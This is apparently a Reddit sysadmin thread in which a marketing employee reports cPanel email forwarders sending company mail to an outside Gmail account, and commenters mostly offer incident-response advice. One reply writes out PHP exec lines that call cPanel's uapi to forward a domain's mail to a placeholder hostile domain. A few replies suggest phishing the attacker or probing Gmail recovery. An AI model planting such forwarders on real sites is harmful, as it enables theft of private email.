Just found an email forwarder to someone outside the company (sensitive data)

[-]

disposeable1200@reddit

As nobody else has explicitly said it - it's 2024, get the hell off cpanel. It's inherently poorly designed, likely insecurely configured and definitely not suitable as a business email system.

Reply

[-]

100% this. As a security guy all I needed from /u/GastonGC's comment were the words cPanel and Email and I was already jumping to external compromise. Many hosts these days disable those features entirely and just keep the web hosting functionality as the email functionality in cPanel is mostly an afterthought and gets even less development focus these days and very little of it is security focused - odds are you were compromised via an known exploit or just brute forced as cPhulk, modsecurity and other security built into cPanel is pretty minimal if its even turned on by your host. Your solution is to move to GSuite, Office 356 or some other modern email solution as even if you lock out this attack more will come as long as you are on that platform for email.

Reply

[-]

Zephk@reddit

Worked for a big webhost using cpanel. Can confirm email handling by cpanel is absolutely garbage. At least as of 9# version a few years ago. I can't imagine Oakley has done good things. I recommend checking the site if they run WordPress or anything else. Since (almost) everything is under the users home directory it's not hard for an attack script to modify ~user/etc directly and I saw that happen quite a bit from a WordPress hack.

Reply

[-]

Independent_Till5832@reddit

Just to clarify you assume they got cpanel access through a wordpress website?

Reply

[-]

Zephk@reddit

Not directly to the cPanel interface. Most of the files for a user's cPanel are stored under the user's home directory folder, e.g. /home/user/.cpanel/ and /home/user/etc/ folder. When a website is compromised, that malware has full read/write to everything in that user's filesystem under /home/user/. If you know what you are doing you can change most things related to the website. The cPanel interface itself when you login runs as your user, so almost anything you can do through the interface you can do through SSH or exec command.  I don't remember if its needs some kind of authentication, otherwise you might be able drop this in any php script on a website and forward all emails for a domain to another domain:  exec("/usr/local/cpanel/bin/uapi Email add_domain_forwarder domain='example.com' destdomain='bad.co'");  or just spesific emails exec("/usr/local/cpanel/bin/uapi Email add_forwarder domain='example.com' email='forwardme@example.com' fwdopt='fwd' fwdemail='somemalicitousemail@bad.co'"); I don't have a cPanel account to test this on and it has been a few years since I directly had to run cPanel API commands.

Reply

[-]

etzel1200@reddit

My sister using Cpanel in her one person business. Do actual orgs use it? 👀

Reply

[-]

HashtagSecurity@reddit

Its mostly very small SMB's - it used to be pushed a lot of commodity providers like GoDaddy as an upsell to single user businesses or <10 user orgs but even they switched away from it I think, most of those that used to sell it default to Office 365 tenancies these days. Most people still on it are just grandfathered in and the provider hasn't shut it down yet but a few of the big ones did that last year so its less and less as time goes on.

Reply

[-]

RikiWardOG@reddit

god the O365 tenant through godaddy is so fucking awful. I hate how so many people get duped into doing it because they don't know any better.

Reply

[-]

Affectionate-Royal17@reddit

Can confirm. I groan every time I see one.

Reply

[-]

PejHod@reddit

It’s so bad dude. But I have successfully defederated M365 tenants from GoDaddy [using this method](https://www.mrsharepoint.guru/how-to-defederate-domain-from-godaddy-365-step-by-step/).

Reply

[-]

9jmp@reddit

You can also do a tenant to tenant migration if need be as well.

Reply

[-]

RikiWardOG@reddit

ha, not like it's generally a huge deal what the tenant name is but that sucks for sure. I guess if you really cared, you could migrate it to another tenant lol.

Reply

[-]

Zealousideal_Mix_567@reddit

Amateurs do

Reply

[-]

KINGGS@reddit

If she’s just a one person business she has almost endless affordable alternatives.

Reply

[-]

HashtagSecurity@reddit

Affordability is relative - looks like OP is in Argentina based on post history, I'm not even guess at what's affordable and whats not with the hyperinflation and price adjustments going on there but if its an option to go that route it we would strongly recommend it.

Reply

[-]

TxTechnician@reddit

Lmao, my first thought was "CPanel, wtf?"

Reply

[-]

raj6126@reddit

I didn’t know they still used cpanel with so many other options easier options

Reply

[-]

Bowlen000@reddit

haha was about to say this. If you are a business. You use M365.

Reply

[-]

chuckescobar@reddit

This was my first thought.

Reply

[-]

Huth_S0lo@reddit

same same

Reply

[-]

greenwas@reddit

If the GMail accounts set do not belong to the employee\\owner of the mailbox then you very likely have a security incident on your hands. \- Pull out your IR plan and start the process. \- If you don't have an IR plan, contact the hotline on your cyber insurance policy. \- If you don't have cyber insurance you likely still need to take all of the steps you would otherwise (not necessarily in order - investigate the issue, determine length of time the rules were in place, what is the size\\scope of the data that was exfiltrated, perform data mining on the corpus of data to identify PII\\PHI\\CI, review contractual\\regulatory\\statutory requirements for notification purposes, notify impacted entities)

Reply

[-]

GastonGC@reddit (OP)

The Gmail account did not belong to the employee/owner of the mailbox. Red flag. The IT guy told me that it was caused by phishing on the employee personal Gmail account that extended to our company email. He later told me that the data that they might have had access to doesn't include any of our client details, so I feel relieved about that. Cpanel is a joke. I learned that from this thread. Considering options developing countries only, what's a better alternative for company emails? I know GSuite is fantastic, but asking small clients to spend a few hundred USD/month on emails is not something everyone can afford.

Reply

[-]

greenwas@reddit

I don't know how your company is set up. The IT guy's explanation makes my spidey sense tingle. If management\\general counsel isn't involved and it's just you and the IT involved, something is wrong. Godspeed.

Reply

[-]

Juic3-d@reddit

I was thinking the same thing

Reply

[-]

steph07728@reddit

@gastongc Follow what @Greenwas posted, and document EVERYTHING!

Reply

[-]

GastonGC@reddit (OP)

Thank you

Reply

[-]

Fun_Permission_888@reddit

/u/ not @

Reply

[-]

Lemonwater925@reddit

Track everything you do and include dates and the time

Reply

[-]

mingocr83@reddit

This is what you need to do... Document every single thing...

Reply

[-]

Jug5y@reddit

Side note if those two execs don't use it, delete the accounts

Reply

[-]

GastonGC@reddit (OP)

Thank you!

Reply

[-]

nanocaust@reddit

If you're marketing, you need to report it to IT and let them handle it, you don't wanna be responsible for the backlash.

Reply

[-]

GastonGC@reddit (OP)

Thank you!

Reply

[-]

bruticusss@reddit

I'm assuming OP wants to cover his own back, and it could very well be Mr IT man who did it. But yes, I agree, if you're in marketing, you shouldn't be messing with things like this

Reply

[-]

carameldelite18@reddit

Eww cpanel?

Reply

[-]

Top_Sector6827@reddit

Contact company owner and turn off the forwarding rule!

Reply

[-]

Wdrussell1@reddit

Not sure what exactly you use for email. But I know in 365 you just need access to the accounts to create a forwarder. So the users who have a forwarder on them, their accounts are compromised. If it is a shared mailbox, then someone with access is compromised.

Reply

[-]

JBD_IT@reddit

In 365 forwarding outside of the domain is disabled. You have to go and change some policies to allow it.

Reply

[-]

Wdrussell1@reddit

This wasn't the default before.

Reply

[-]

JBD_IT@reddit

Its been the default for like 6-7 years at least

Reply

[-]

Wdrussell1@reddit

I challenge that. I have setup new 365 environments as projects and as early as a year or two ago it wasn't the default.

Reply

[-]

disclosure5@reddit

> Not sure what exactly you use for email. They made multiple references to cPanel so... Take everything you know about mail security and forget it. This 90's style IMAP, there won't be MFA and there won't even be login audit trails.

Reply

[-]

Priorly-A-Cat@reddit

> there won't even be login audit trails. There is if it's a VPS or dedicated server - how far back depends on if the admin actually admin'd the thing !!! ( extended log rollover and included these logs in system backups, and how long they retain those backups ). Your typical web designer doesn't have the knowledge of a server admin to know that these things even exist. Said logs would not be accessible to hosting customer if it's a shared account (and they'd be at ethe mercy of teh hosting provider's decisions re: retention; they'd need to get hosting provider to scrape those logs. As of fairly recently, there is now 2FA for the webmail at least.

Reply

[-]

lechango@reddit

In 365 a user could set a rule to auto-forward everything themselves, however this will fail assuming defaults are still set to not allow external auto-forwarding.

Reply

[-]

eastside-hustle@reddit

Cpanel has a ton of vulnerabilities some of which could be leveraged for RCE to create forwarder. Or could be as simple as weak credentials for one of the Cpanel accounts. Regardless, assume your Cpanel is compromised and start the IR process.

Reply

[-]

SurpriseIllustrious5@reddit

This sounds like the scam where they hijack client invoices and change the payment details. Have a chat to your AR and see if they have any open disputes of payments that they didn't receive .

Reply

[-]

Sad-Sundae2124@reddit

I’m not exchange specialist but in my job you cannot send mail to external mail without using a « send to external » button in outlook. It prevent mail forwarding etc. It’s really helpful to prevent such behavior.

Reply

[-]

Admin4CIG@reddit

You must have an add-on of some kind because my Outlook desktop app for EXO doesn't have such button. And I send to external all the time.

Reply

[-]

Sad-Sundae2124@reddit

For sure it’s an add on it’s not a native function

Reply

[-]

diabeeto076@reddit

Heh, you're marketing. Why do you have access to Cpanel?

Reply

[-]

RaNdomMSPPro@reddit

An authorized account logged into the cpanel account and setup the forwarding rules. Most likely, someone's creds were obtained in another data breach or possibly phishing - humans will re-use passwords or have password patterns that make it easy on the bad guys. Break out your IR plan. Check the access logs and whatever else cpanel may have available to see if you can tell what happened.

Reply

[-]

daytonhaney@reddit

So true. My last manager was always telling me the first thing to do is check for newly created mail rules, literally every day he harped about forwarding rules

Reply

[-]

netsysllc@reddit

cpanel and marking having access. I am out....

Reply

[-]

StrangeCaptain@reddit

Let the IT guy handle it

Reply

[-]

CaptainZhon@reddit

You are marketing not IT- open an IT ticket and let them deal with this

Reply

[-]

Priorly-A-Cat@reddit

Maybe going to turn out there's a end-user of these 2 mailboxes stuck in their ways and insists on using Gmail app on their mobile device or even on their desktop because they don't like Outlook.

Reply

[-]

Priorly-A-Cat@reddit

Yes and yes. As someone said, *YOU* shouldn't be doing this investigation in your position; you lack the knowledge.

Reply

[-]

soc_monn@reddit

DLP — ding ding ding.

Reply

[-]

bobs143@reddit

Using CPanel and the forwarder scream security incident. Start documenting everything and reach out for help. Collect evidence and send this up the chain of command.

Reply

[-]

ph33rlus@reddit

CPanel? I’ve had people hack into our cPanel for multiple domains and our hosting company just blows it off like it’s nothing. So now I have to watch our website file systems and emails like a hawk. If you can narrow down a time frame access logs might show you who logged in from where

Reply

[-]

craigleary@reddit

Find a new host. Sorry I know not helpful but while you should certainly monitor your site if you host shows they don’t care to investigate how something like this is happening then they probably don’t care much for server security. What you describe is not a CPAnel problem itself - if someone is accessing your CPAnel login directly id be concerned because that could be root -> your CPAnel via some auto login. If you mean having into your CPAnel like your sites are getting compromised on multiple domains that tends to be more from some compromised like in Wordpress then infecting any domain under the same user.

Reply

[-]

ph33rlus@reddit

Oh and any CPanel accounts have randomly generated 18digit passwords so it’s not an issue of compromised credentials

Reply

[-]

craigleary@reddit

You mention CPAnel is this basic webhosting or you admin the server? First enable two factor auth in CPAnel. Webmail users also have the option to enable two factor auth (114+ version) Next - logs. Server admin needs to check the access/login/api logs to see when the email forwarder was created in CPAnel. The logs go back quite some time and you should be able to identify the ip. The exim logs may only go back a month or so but you can get all the emails forwarded to this gmail. An email forwarder is unlikely to be the result of something like a php shell as far as I remember email forwarders are outside the home dir unlike the password/user of email accounts. If you are not admin then CPAnel logs are not accessible to you. Email logs are partially accessible in CPAnel itself. Last logins there used to be a last login file called .last login that will shows ips and dates accessing CPAnel itself but not webmail.

Reply

[-]

Synack1337@reddit

Oh my god, people still use cpanel/plesk or any other hosting solutions for emails in 2024??? In cpanel or plesk if someone gained access via compromised credentials or a hack, they will be able to access all your emails and do whatever without you even noticing. Please move to Google Workspace or Microsoft 365.

Reply

[-]

ength2@reddit

Do you have the email configured on outlook or any other client? Because forwarding rules can be created there as well.

Reply

[-]

kevin4076@reddit

We've seen malware exploit weaknesses and insert forwarding rules into inboxes that might/are used by senior staff, especially where large transactions are taking place. This exploit did not require cpanel access.

Reply

[-]

dnuohxof-1@reddit

I remember cPanel…. From like 2015……

Reply

[-]

ShowMeYourT_Ds@reddit

If anyone of those 4 have their creds saved in browser, and have ever left their machine unlocked and unattended around when they’re not in front of it…could be source of breach.

Reply

[-]

Long_Start_3142@reddit

If they're email is on cpanel then you probably have webmail enabled and someone obtained the USERS credentials and made the forward within the webmail account. This wouldn't require cpanel admin

Reply

[-]

al2cane@reddit

Don't go into a panic. If your cpanel email accounts are legacy i.e. your MX records do not point to your web host then they are not actually used any longer. I've seen several cases where the IT guy migrated from cpanel starter email accounts to Office365 or Gsuite, possibly in your case, but never deleted the cpanel email accounts. Get further technical input with the specifics you've found (private info, don't post them here) and take it from there.

Reply

[-]

A8Bit@reddit

cpanel email accounts come with a webmail login. Once logged in you get a landing page that allows you to set up forwarders, autoresponders, email filters etc. etc. Any user with an email account and access to the webmail interface can do it for their own account. You need admin access to get to the 'forward all email from this domain to another one' option. If your company is using roundcube or horde as your groupware solution and the users log in through [webmail.yourdomain.com](https://webmail.yourdomain.com) they'll have access to these options.

Reply

[-]

nullrecord@reddit

Phish them back, send a mail to the internal that they need to provide some corporate information or click on a link, then watch from where the link got clicked.

Reply

[-]

That-Twist8022@reddit

if that doesnt work. i suggest you to try to do a password request of such gmail account. hopefully you may get the first or last 2 digits of the phone number of owner of such account, and then try to figure out if that phone is associated to an employee in your company.

Reply

[-]

cubic_sq@reddit

Is your mail hosted by the same company that has your cpanel ? Or at google / microsoft / somewhere else?

Reply

Reply to Post

74 Comments